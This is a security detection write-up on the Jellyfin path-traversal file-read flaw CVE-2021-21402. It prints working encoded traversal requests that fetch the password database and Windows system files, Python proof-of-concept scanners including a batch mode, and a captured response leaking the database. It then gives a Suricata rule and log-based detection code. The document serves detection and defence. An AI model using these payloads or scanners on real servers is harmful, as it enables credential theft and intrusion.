
T1190 - CVE-2021-21402 - Jellyfin arbitrary file read vulnerability

Description from ATT&CK

The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (such as SQL), standard services (such as SMB or SSH), and any other application with Internet-accessible open sockets, such as web servers and related services. Depending on the flaw being exploited, this may include Exploitation for Defense Evasion.

If an application is hosted on cloud-based infrastructure, exploiting it may lead to compromise of the underlying instance. This can give an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.

For websites and databases, the OWASP Top 10 and CWE Top 25 highlight the most common web-based vulnerabilities.

Test case

Jellyfin is a free software media system. In Jellyfin before 10.7.1, an attacker can read arbitrary files on the Jellyfin server through a crafted request; the issue is more prevalent when the server runs on a Windows host. The vulnerability was fixed in version 10.7.1.

Affected versions: Jellyfin < 10.7.1

Detection log source

HTTP

Reproduction

Exploit POC

Download jellyfin.db (which contains the user passwords) from the server:

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

Unauthenticated read of Windows files

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/

Read the hosts file

/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3/

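Why the request paths above escape the directory the HLS segment is supposed to live in, and the containment check that rejects them. This is an added illustration for this page, not Jellyfin's own code: the base directories are assumed values, the request paths are the ones quoted above, and decoding the segment exactly once mirrors what a typical web framework does before a handler sees it. The check is separator-agnostic, so it also shows why the backslash payload only climbs out of the base directory under Windows path rules (ntpath) and stays harmless under POSIX rules (posixpath).

```python
"""Containment check for the HLS segment name of an
/Audio/<id>/hls/<segment>/stream.<ext>/ request.

Added illustration for this page; not Jellyfin's code. Base directories
are assumed values, and the segment is percent-decoded exactly once,
which is the usual framework behaviour (assumption).
"""
import ntpath
import posixpath
from urllib.parse import unquote

# Assumed base directories (not taken from any real Jellyfin install).
WINDOWS_BASE = r"C:\ProgramData\Jellyfin\Server\transcodes"
POSIX_BASE = "/var/lib/jellyfin/transcodes"

# Path rules per platform: ntpath treats '\' as a separator, posixpath does not.
FLAVOURS = {"nt": ntpath, "posix": posixpath}


def hls_segment(request_path: str) -> str:
    """Return the still-encoded component between '/hls/' and '/stream.'."""
    _, sep, rest = request_path.partition("/hls/")
    if not sep:
        raise ValueError("not an HLS audio request")
    segment, sep, _ = rest.partition("/stream.")
    if not sep:
        raise ValueError("no stream file name")
    return segment


def resolve(base: str, segment: str, os_name: str) -> str:
    """Decode once and resolve the segment against base with the platform's rules.
    Under ntpath the decoded '..\\' components climb out of base; under posixpath
    the same characters form one odd file name inside base."""
    flavour = FLAVOURS[os_name]
    return flavour.normpath(flavour.join(base, unquote(segment)))


def is_inside(base: str, resolved: str, os_name: str) -> bool:
    """True when the resolved path is base itself or lies below it.
    commonpath avoids the classic prefix bug (base 'C:\\x' matching 'C:\\xyz')."""
    flavour = FLAVOURS[os_name]
    try:
        return flavour.commonpath([base, resolved]) == base
    except ValueError:  # different drives, or absolute mixed with relative
        return False


def check_request(request_path: str, base: str, os_name: str):
    """Return (resolved_path, allowed) for a request path."""
    resolved = resolve(base, hls_segment(request_path), os_name)
    return resolved, is_inside(base, resolved, os_name)


if __name__ == "__main__":
    for path in (
        "/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/",
        "/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/",
        "/Audio/anything/hls/main/stream.mp3/",
    ):
        print("nt   ", path, "->", check_request(path, WINDOWS_BASE, "nt"))
        print("posix", path, "->", check_request(path, POSIX_BASE, "posix"))
```

Under "nt" rules the first path resolves to the assumed data directory and the second to C:\Windows\win.ini, both outside the base and therefore rejected; under "posix" rules the same requests resolve to a single file name inside the base, which is why the page notes the issue is mostly a Windows-host problem. The same commonpath test rejects a forward-slash traversal on either platform.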

Python POC

# Batch mode: one base URL per line in a text file
import sys

import requests
import urllib3

urllib3.disable_warnings()

if len(sys.argv) != 2:
    print('Usage: python3 xxx.py urls.txt')
    sys.exit()

# Same check path as the single-target script below
CHECK_PATH = "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    'Content-Type': 'application/octet-stream',
}

with open(sys.argv[1], 'r') as f:
    for line in f:
        url = line.strip()
        if not url:
            continue
        url = url + CHECK_PATH
        response = requests.get(url, headers=HEADERS, verify=False)
        if response.status_code == 200:
            print(url + "  vulnerable")
        else:
            print(url + "  not vulnerable")

# Single target
import sys

import requests
import urllib3

urllib3.disable_warnings()

if len(sys.argv) != 2:
    print('Usage: python3 xxx.py http://xxx.xxx.xxx.xxx')
    sys.exit()

url = sys.argv[1] + "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    'Content-Type': 'application/octet-stream',
}
response = requests.get(url, headers=headers, verify=False)
if response.status_code == 200:
    print("vulnerable")
else:
    print("not vulnerable")

Test traces

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host: 10.16.45.164:5577
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 10:13:59 GMT
Content-Type: application/octet-stream
Server: Microsoft-NetCore/2.0, UPnP/1.0 DLNADOC/1.50
Content-Length: 331776
Cache-Control: public
Last-Modified: Sun, 04 Apr 2021 15:34:24 GMT
Accept-Ranges: bytes
Age: 326376
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Cookie, Date, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, Want-Digest, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: 110.93.247.208:5577

SQLite format 3......@  [email protected]...............................................................@..?...........................................................}...?+...indexIX_AccessSchedules_UserIdAccessSchedules.CREATE INDEX "IX_AccessSchedules_UserId" ON "AccessSchedules" ("UserId").<
..##..?tablePreferencesPreferences.CREATE TABLE "Preferences" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_Preferences" PRIMARY KEY AUTOINCREMENT,
    "Kind" INTEGER NOT NULL,
    "Value" TEXT NOT NULL,
    "RowVersion" INTEGER NOT NULL,
    "Preference_Preferences_Guid" TEXT NULL,
    CONSTRAINT "FK_Preferences_Users_Preference_Preferences_Guid" FOREIGN KEY ("Preference_Preferences_Guid") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).? ..##..EtablePermissionsPermissions
CREATE TABLE "Permissions" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_Permissions" PRIMARY KEY AUTOINCREMENT,
    "Kind" INTEGER NOT NULL,
    "Value" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL,
    "Permission_Permissions_Guid" TEXT NULL,
    CONSTRAINT "FK_Permissions_Users_Permission_Permissions_Guid" FOREIGN KEY ("Permission_Permissions_Guid") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).X...!!..{tableImageInfosImageInfos    CREATE TABLE "ImageInfos" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_ImageInfos" PRIMARY KEY AUTOINCREMENT,
    "UserId" TEXT NULL,
    "Path" TEXT NOT NULL,
    "LastModified" TEXT NOT NULL,
    CONSTRAINT "FK_ImageInfos_Users_UserId" FOREIGN KEY ("UserId") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).....++..etableAccessSchedulesAccessSchedules.CREATE TABLE "AccessSchedules" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_AccessSchedules" PRIMARY KEY AUTOINCREMENT,
    "UserId" TEXT NOT NULL,
    "DayOfWeek" INTEGER NOT NULL,
    "StartHour" REAL NOT NULL,
    "EndHour" REAL NOT NULL,
    CONSTRAINT "FK_AccessSchedules_Users_UserId" FOREIGN KEY ("UserId") REFERENCES "Users" ("Id") ON DELETE CASCADE
)..........tableUsersUsers.CREATE TABLE "Users" (
    "Id" TEXT NOT NULL CONSTRAINT "PK_Users" PRIMARY KEY,
    "Username" TEXT NOT NULL,
    "Password" TEXT NULL,
    "EasyPassword" TEXT NULL,
    "MustUpdatePassword" INTEGER NOT NULL,
    "AudioLanguagePreference" TEXT NULL,
    "AuthenticationProviderId" TEXT NOT NULL,
    "PasswordResetProviderId" TEXT NOT NULL,
    "InvalidLoginAttemptCount" INTEGER NOT NULL,
    "LastActivityDate" TEXT NULL,
    "LastLoginDate" TEXT NULL,
    "LoginAttemptsBeforeLockout" INTEGER NULL,
    "SubtitleMode" INTEGER NOT NULL,
    "PlayDefaultAudioTrack" INTEGER NOT NULL,
    "SubtitleLanguagePreference" TEXT NULL,
    "DisplayMissingEpisodes" INTEGER NOT NULL,
    "DisplayCollectionsView" INTEGER NOT NULL,
    "EnableLocalPassword" INTEGER NOT NULL,
    "HidePlayedInLatest" INTEGER NOT NULL,
    "RememberAudioSelections" INTEGER NOT NULL,
    "RememberSubtitleSelections" INTEGER NOT NULL,
    "EnableNextEpisodeAutoPlay" INTEGER NOT NULL,
    "EnableAutoLogin" INTEGER NOT NULL,
    "EnableUserPreferenceAccess" INTEGER NOT NULL,
    "MaxParentalAgeRating" INTEGER NULL,
    "RemoteClientBitrateLimit" INTEGER NULL,
    "InternalId" INTEGER NOT NULL,
    "SyncPlayAccess" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL
))...=...indexsqlite_autoindex_Users_1Users.P...++.Ytablesqlite_sequencesqlite_sequence.CREATE TABLE sqlite_sequence(name,seq).)...%%...tableActivityLogsActivityLogs.CREATE TABLE "ActivityLogs" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_ActivityLogs" PRIMARY KEY AUTOINCREMENT,
    "Name" TEXT NOT NULL,
    "Overview" TEXT NULL,
    "ShortOverview" TEXT NULL,
    "Type" TEXT NOT NULL,
    "UserId" TEXT NOT NULL,
    "ItemId" TEXT NULL,
    "DateCreated" TEXT NOT NULL,
    "LogSeverity" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL
).X...77..Otable__EFMigrationsHistory__EFMigrationsHistory.CREATE TABLE "__EFMigrationsHistory" (
    "MigrationId" TEXT NOT NULL CONSTRAINT "PK___EFMigrationsHistory" PRIMARY KEY,
    "ProductVersion" TEXT NOT NULL
)I...]7..indexsqlite_autoindex___EFMigrationsHistory_1__EFMigrationsHistor
......

Detection rules / approach

Suricata rule

alert http any any -> any any (msg:"CVE-2021-21402 Jellyfin arbitrary file read"; flow:established,to_server; content:"GET"; http_method; content:"/Audio/"; http_uri; content:"/hls/"; http_uri; distance:0; content:"/stream"; http_uri; distance:0; reference:url,www.cnblogs.com/0day-li/p/14637768.html; reference:cve,2021-21402; classtype:web-application-attack; sid:3002021; rev:1;)
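The same detection idea run over web-server access-log lines, as an added example for this page (it is not Jellyfin's code and not a Suricata rule). The log lines are constructed in NCSA common format with made-up client addresses and sizes, and the field layout is an assumption; the request paths are the ones captured on this page. Unlike the rule above, which keys only on the /Audio/.../hls/.../stream path shape, this check decodes the segment name and alerts only when it contains a '..' component or a path separator, so ordinary HLS playback of a segment such as "main" is not reported.

```python
"""Traversal check over access-log lines for the request shape used by
CVE-2021-21402.

Added example for this page; not Jellyfin's code. Log lines are
constructed (NCSA common format, made-up addresses and sizes).
"""
import re
from urllib.parse import unquote

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2021:10:13:59 +0000] "GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1" 200 331776
10.0.0.5 - - [08/Apr/2021:10:14:02 +0000] "GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/ HTTP/1.1" 200 403
10.0.0.7 - - [08/Apr/2021:10:15:10 +0000] "GET /Audio/9f1c/hls/main/stream.mp3/ HTTP/1.1" 200 120334
10.0.0.9 - - [08/Apr/2021:10:16:00 +0000] "GET /Audio/9f1c/hls/..%255Cdata%255Cjellyfin.db/stream.mp3/ HTTP/1.1" 404 0
10.0.0.8 - - [08/Apr/2021:10:17:00 +0000] "GET /web/index.html HTTP/1.1" 200 5120
"""

# NCSA common log format: client ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Route shape from the page: /Audio/<item>/hls/<segment>/stream.<ext>/
HLS_RE = re.compile(r"^/Audio/[^/]+/hls/(?P<segment>.+)/stream\.[A-Za-z0-9]+/?$", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3):
    """Percent-decode until the value stops changing; returns (decoded, rounds)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def traversal_reason(raw_segment: str):
    """Reason string if the segment would leave its directory, else None.
    A legitimate segment is a single name, so any separator is suspicious
    and a '..' component is the traversal itself."""
    decoded, rounds = fully_decode(raw_segment)
    parts = re.split(r"[\\/]", decoded)
    if ".." in parts:
        return f"'..' component after {rounds} decoding round(s)"
    if len(parts) > 1:
        return f"path separator in segment after {rounds} decoding round(s)"
    return None


def analyse(log_text: str):
    """Return one finding per suspicious HLS request line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"].upper() != "GET":
            continue
        h = HLS_RE.match(m["path"])
        if not h:
            continue
        reason = traversal_reason(h["segment"])
        if reason is None:
            continue
        findings.append({
            "src": m["src"], "ts": m["ts"], "path": m["path"],
            "status": int(m["status"]), "reason": reason,
            # A 200 means the server served the file; anything else is an attempt.
            "outcome": "likely succeeded" if m["status"] == "200" else "attempt",
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["src"], f["status"], f["outcome"], "-", f["reason"], "-", f["path"])
```

On the constructed sample this reports the two captured requests from 10.0.0.5 as likely successful (HTTP 200, the first with a body size matching a SQLite file) and the 404 line from 10.0.0.9 as an attempt, while the normal playback line and the unrelated /web/ request produce nothing. Decoding is repeated until the value is stable so that a doubly encoded segment is inspected the same way as a singly encoded one.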

Recommendations

This attack is relatively easy to detect with network traffic analysis and security devices. Note that the rule above keys on the /Audio/.../hls/.../stream path shape, which legitimate HLS playback also uses; adding a match on the traversal sequence in the URI (an encoded ".." followed by an encoded backslash or slash, as in the captured request) keeps the alert specific to this vulnerability.

References

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/

Jellyfin arbitrary file read vulnerability (CVE-2021-21402)

https://www.cnblogs.com/0day-li/p/14637768.html